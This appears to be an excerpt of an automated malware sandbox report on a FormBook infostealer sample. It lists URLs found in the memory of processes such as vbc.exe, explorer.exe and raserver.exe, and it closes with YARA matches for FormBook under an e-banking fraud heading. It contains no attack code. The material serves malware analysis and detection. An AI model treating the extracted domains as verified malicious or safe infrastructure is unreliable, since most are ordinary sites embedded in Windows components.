Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.nate.com/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.naver.com/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.sify.com/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&p=
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search2.estadao.com.br/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 00000006.00000000.2170756104.0000000004F30000.00000002.00000001.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 00000006.00000000.2169159950.0000000003E27000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.web.de/favicon.ico
Source: vbc.exe, vbc.exe, 00000005.00000002.2192908833.0000000000D32000.00000020.00020000.sdmp, raserver.exe, 00000007.00000002.2352947672.00000000003E0000.00000004.00000001.sdmp, vbc.exe.2.dr	String found in binary or memory: http://topicalmemorysystem.googlecode.com/files/
Source: explorer.exe, 00000006.00000000.2180147925.000000000A330000.00000008.00000001.sdmp	String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://udn.com/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://uk.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://video.globo.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://web.ask.com/
Source: explorer.exe, 00000006.00000000.2170234716.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000006.00000000.2169159950.0000000003E27000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000006.00000000.2180147925.000000000A330000.00000008.00000001.sdmp	String found in binary or memory: http://www.%s.com
Source: explorer.exe, 00000006.00000000.2163666478.0000000001C70000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.co.uk/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&keyword=
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&tag=ie8search-20&index=blended&linkCode=qs&c
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.aol.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.baidu.com/favicon.ico
Source: vbc.exe, vbc.exe, 00000005.00000002.2192908833.0000000000D32000.00000020.00020000.sdmp, raserver.exe, 00000007.00000002.2352947672.00000000003E0000.00000004.00000001.sdmp, vbc.exe.2.dr	String found in binary or memory: http://www.biblegateway.com/passage/?search=
Source: vbc.exe, vbc.exe, 00000005.00000002.2192908833.0000000000D32000.00000020.00020000.sdmp, raserver.exe, 00000007.00000002.2352947672.00000000003E0000.00000004.00000001.sdmp, vbc.exe.2.dr	String found in binary or memory: http://www.biblija.net/biblija.cgi?m=
Source: vbc.exe	String found in binary or memory: http://www.blueletterbible.org/Bible.cfm?b=
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: 18EE8C7E.emf.0.dr	String found in binary or memory: http://www.day.com/dam/1.0
Source: vbc.exe	String found in binary or memory: http://www.esvstudybible.org/search?q=
Source: vbc.exe, 00000004.00000000.2136712287.0000000000D32000.00000020.00020000.sdmp, vbc.exe, 00000005.00000002.2192908833.0000000000D32000.00000020.00020000.sdmp, raserver.exe, 00000007.00000002.2352947672.00000000003E0000.00000004.00000001.sdmp, vbc.exe.2.dr	String found in binary or memory: http://www.esvstudybible.org/search?q=Whttp://www.blueletterbible.org/Bible.cfm?b=
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2170234716.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.com.tw/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.com/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.de/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.es/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.it/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.si/
Source: explorer.exe, 00000006.00000000.2168635423.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2169159950.0000000003E27000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000006.00000000.2170234716.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&a=
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000006.00000000.2168635423.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.nifty.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 00000006.00000000.2168213877.00000000039F4000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000006.00000000.2176027933.00000000082FD000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.recherche.aol.fr/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.target.com/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.walmart.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2168635423.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.yam.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&Version=2008-06-26&Operation
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://z.about.com/m/a08.ico
Source: raserver.exe, 00000007.00000002.2353667108.0000000002B2F000.00000004.00000001.sdmp	String found in binary or memory: https://ads.google.com/localservices
Source: raserver.exe, 00000007.00000002.2353667108.0000000002B2F000.00000004.00000001.sdmp	String found in binary or memory: https://business.google.com
Source: raserver.exe, 00000007.00000002.2353667108.0000000002B2F000.00000004.00000001.sdmp	String found in binary or memory: https://lh5.googleusercontent.com/sINETdlRp3GN0xevPlbTYIeaRUZ89Yhmrokk8fTSj9ZtL8p8LuS1F0klmA6P50EGFU
Source: raserver.exe, 00000007.00000002.2353667108.0000000002B2F000.00000004.00000001.sdmp	String found in binary or memory: https://quallateematerial.com
Source: raserver.exe, 00000007.00000002.2353667108.0000000002B2F000.00000004.00000001.sdmp	String found in binary or memory: https://schema.org/Locuseriness
Source: raserver.exe, 00000007.00000002.2353667108.0000000002B2F000.00000004.00000001.sdmp	String found in binary or memory: https://workspace.google.com
Source: raserver.exe, 00000007.00000002.2353667108.0000000002B2F000.00000004.00000001.sdmp	String found in binary or memory: https://www.gstatic.com/_/mss/boq-geo/_/js/k=boq-geo.GeoMerchantPrestoSiteUi.en_US.SQpGvHpXB-8.es5.O

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000007.00000002.2352874272.00000000002A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2161460601.0000000003339000.00000004.00000001.sdmp, type: MEMORY
